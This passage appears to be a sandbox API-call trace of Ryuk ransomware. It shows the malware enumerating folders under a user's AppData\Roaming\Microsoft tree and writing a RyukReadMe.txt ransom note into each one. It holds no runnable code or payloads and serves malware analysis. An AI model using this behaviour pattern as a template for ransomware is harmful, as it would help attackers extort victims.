dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.770] GetLastError () returned 0x0 [0149.770] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.771] CloseHandle (hObject=0x194) returned 1 [0149.771] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.772] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.772] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.772] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.772] SetLastError (dwErrCode=0x0) [0149.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\xlstart\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.772] GetLastError () returned 0x0 [0149.772] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.773] CloseHandle (hObject=0x194) returned 1 [0149.773] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.773] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.773] SetLastError (dwErrCode=0x0) [0149.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Excel\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\excel\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.773] GetLastError () returned 0xb7 [0149.773] CloseHandle (hObject=0x190) returned 1 [0149.773] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.773] SetLastError (dwErrCode=0x0) [0149.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.773] GetLastError () returned 0xb7 [0149.773] CloseHandle (hObject=0x190) returned 1 [0149.773] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.774] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.774] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.774] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.774] SetLastError (dwErrCode=0x0) [0149.774] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.774] GetLastError () returned 0x0 [0149.774] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0149.775] CloseHandle (hObject=0x190) returned 1 [0149.775] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.775] SetLastError (dwErrCode=0x0) [0149.775] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.775] GetLastError () returned 0xb7 [0149.775] CloseHandle (hObject=0x190) returned 1 [0149.775] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.776] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.776] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.776] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.776] SetLastError (dwErrCode=0x0) [0149.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.776] GetLastError () returned 0x0 [0149.776] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0149.777] CloseHandle (hObject=0x190) returned 1 [0149.777] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.777] SetLastError (dwErrCode=0x0) [0149.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.777] GetLastError () returned 0xb7 [0149.777] CloseHandle (hObject=0x190) returned 1 [0149.777] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.778] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.778] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.778] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.778] SetLastError (dwErrCode=0x0) [0149.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp8_1\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.778] GetLastError () returned 0x0 [0149.778] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0149.779] CloseHandle (hObject=0x190) returned 1 [0149.779] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.779] SetLastError (dwErrCode=0x0) [0149.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.779] GetLastError () returned 0xb7 [0149.779] CloseHandle (hObject=0x190) returned 1 [0149.779] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.779] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.779] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0149.779] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0149.780] SetLastError (dwErrCode=0x0) [0149.780] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp9_0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.780] GetLastError () returned 0x0 [0149.780] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0149.781] CloseHandle (hObject=0x190) returned 1 [0149.781] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0149.781] SetLastError (dwErrCode=0x0) [0149.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0149.781] GetLastError () returned 0xb7 [0149.781] CloseHandle (hObject=0x190) returned 1 [0149.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0149.781] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.781] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.781] SetLastError (dwErrCode=0x0) [0149.781] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.782] GetLastError () returned 0x0 [0149.782] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0149.782] CloseHandle (hObject=0x194) returned 1 [0149.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.783] SetLastError (dwErrCode=0x0) [0149.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.783] GetLastError () returned 0x0 [0149.783] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.784] CloseHandle (hObject=0x198) returned 1 [0149.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0149.784] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.784] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.784] SetLastError (dwErrCode=0x0) [0149.784] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.785] GetLastError () returned 0x0 [0149.785] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.786] CloseHandle (hObject=0x19c) returned 1 [0149.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.787] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.787] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.787] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.787] SetLastError (dwErrCode=0x0) [0149.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.787] GetLastError () returned 0x0 [0149.787] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.788] CloseHandle (hObject=0x19c) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.789] SetLastError (dwErrCode=0x0) [0149.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.789] GetLastError () returned 0xb7 [0149.789] CloseHandle (hObject=0x19c) returned 1 [0149.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.789] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.789] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.789] SetLastError (dwErrCode=0x0) [0149.789] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.790] GetLastError () returned 0x0 [0149.790] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.791] CloseHandle (hObject=0x19c) returned 1 [0149.791] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0149.792] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0149.792] SetLastError (dwErrCode=0x0) [0149.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.792] GetLastError () returned 0xb7 [0149.792] CloseHandle (hObject=0x198) returned 1 [0149.792] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.792] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0149.792] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0149.792] SetLastError (dwErrCode=0x0) [0149.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.792] GetLastError () returned 0xb7 [0149.792] CloseHandle (hObject=0x194) returned 1 [0149.792] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0149.792] SetLastError (dwErrCode=0x0) [0149.792] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0149.792] GetLastError () returned 0xb7 [0149.792] CloseHandle (hObject=0x194) returned 1 [0149.792] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0149.793] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.793] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0149.793] SetLastError (dwErrCode=0x0) [0149.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0149.793] GetLastError () returned 0x0 [0149.793] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0149.794] CloseHandle (hObject=0x198) returned 1 [0149.794] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0149.794] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.794] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.794] SetLastError (dwErrCode=0x0) [0149.794] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.797] GetLastError () returned 0x0 [0149.797] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0149.798] CloseHandle (hObject=0x19c) returned 1 [0149.798] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*.*", lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0x3a3000 [0149.798] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0149.798] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0149.798] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0149.799] SetLastError (dwErrCode=0x0) [0149.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, 